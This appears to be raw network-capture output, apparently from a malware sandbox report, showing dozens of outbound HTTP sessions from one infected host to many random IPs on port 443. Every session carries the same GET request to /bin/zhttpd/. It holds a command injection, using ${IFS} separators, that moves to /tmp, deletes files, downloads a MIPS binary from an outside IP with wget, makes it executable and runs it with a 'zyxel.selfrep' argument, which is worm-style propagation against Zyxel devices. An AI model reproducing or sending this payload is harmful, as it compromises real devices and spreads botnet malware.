                                          Jan 14, 2024 15:46:29.293107986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7557192.168.2.236080436.59.82.41443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.293137074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7558192.168.2.234378414.102.216.161443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.293174028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7559192.168.2.234636279.153.117.23443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.293216944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7560192.168.2.235321219.120.112.202443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.293230057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7561192.168.2.2334596199.82.27.121443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.293260098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7562192.168.2.2348628148.211.245.13443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.293266058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7563192.168.2.2356226102.2.128.126443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.293293953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7564192.168.2.2356626210.244.57.253443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.293307066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7565192.168.2.2333924168.19.35.41443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.293329000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7566192.168.2.2332828107.145.147.218443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.293342113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7567192.168.2.2348246170.111.239.148443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.293364048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7568192.168.2.2348136222.233.68.86443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.293397903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7569192.168.2.235702064.230.48.201443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.293400049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7570192.168.2.234822894.90.111.133443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.293431044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7571192.168.2.2336674204.47.189.50443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.293458939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7572192.168.2.2347916164.83.196.48443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.293469906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7573192.168.2.2351256143.69.254.108443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.293499947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7574192.168.2.2355788186.24.203.153443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.293559074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7575192.168.2.234136834.27.22.118443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.293584108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7576192.168.2.2347016106.114.55.105443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.293591976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7577192.168.2.234073887.220.5.34443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.293618917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7578192.168.2.234061250.62.238.157443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.293673992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7579192.168.2.2335590151.122.170.21443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.293698072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7580192.168.2.235120840.55.199.115443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.293721914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7581192.168.2.2348638187.134.124.35443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.293761015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7582192.168.2.2348016199.19.237.82443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.293797016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7583192.168.2.235071476.242.20.1443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.293812990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7584192.168.2.2352032177.240.237.42443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.293852091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7585192.168.2.2338338135.42.237.164443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.293860912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7586192.168.2.2336270141.1.65.2443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.293899059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7587192.168.2.2343898156.225.192.192443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.293931961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7588192.168.2.233557280.26.62.222443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.293932915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7589192.168.2.2359848153.210.94.182443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.293960094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7590192.168.2.2356772208.172.185.47443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.294003010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7591192.168.2.234918465.92.226.113443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.294019938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7592192.168.2.2345820126.77.194.111443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.294061899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7593192.168.2.234816649.231.148.178443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.294106960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7594192.168.2.233644044.79.29.153443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.294142962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7595192.168.2.2339298173.119.24.142443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.294156075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7596192.168.2.234138258.112.125.191443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.294177055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7597192.168.2.234031693.46.58.118443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.294210911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7598192.168.2.235160879.37.248.162443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.294245958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7599192.168.2.233801831.130.135.180443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.294275999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7600192.168.2.2346578191.65.175.22443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.294296026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7601192.168.2.234993468.213.219.79443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.294343948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7602192.168.2.2351400120.193.138.6443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.294369936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7603192.168.2.2360498146.245.233.0443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.294409990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7604192.168.2.234890444.12.88.156443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.294444084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7605192.168.2.235253618.248.133.249443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.294461966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7606192.168.2.2346398183.183.67.147443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.294466019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7607192.168.2.233328270.195.222.8443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.294517994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7608192.168.2.2360912149.8.181.165443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.294534922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7609192.168.2.2360874145.26.115.237443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.294553041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7610192.168.2.2359898132.111.54.27443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.294596910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7611192.168.2.2356286176.235.25.141443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.294625044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7612192.168.2.2346606217.165.124.40443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.294645071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7613192.168.2.2358916118.255.220.162443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.294683933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7614192.168.2.234702878.208.34.99443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.294708967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7615192.168.2.2336198190.134.45.1443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.294737101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7616192.168.2.233526445.79.41.21443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.294753075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7617192.168.2.2354854177.16.21.9443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.294785976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7618192.168.2.235859212.110.180.227443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.294785976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7619192.168.2.234758294.254.210.63443
                                          TimestampBytes transferredDirectionData
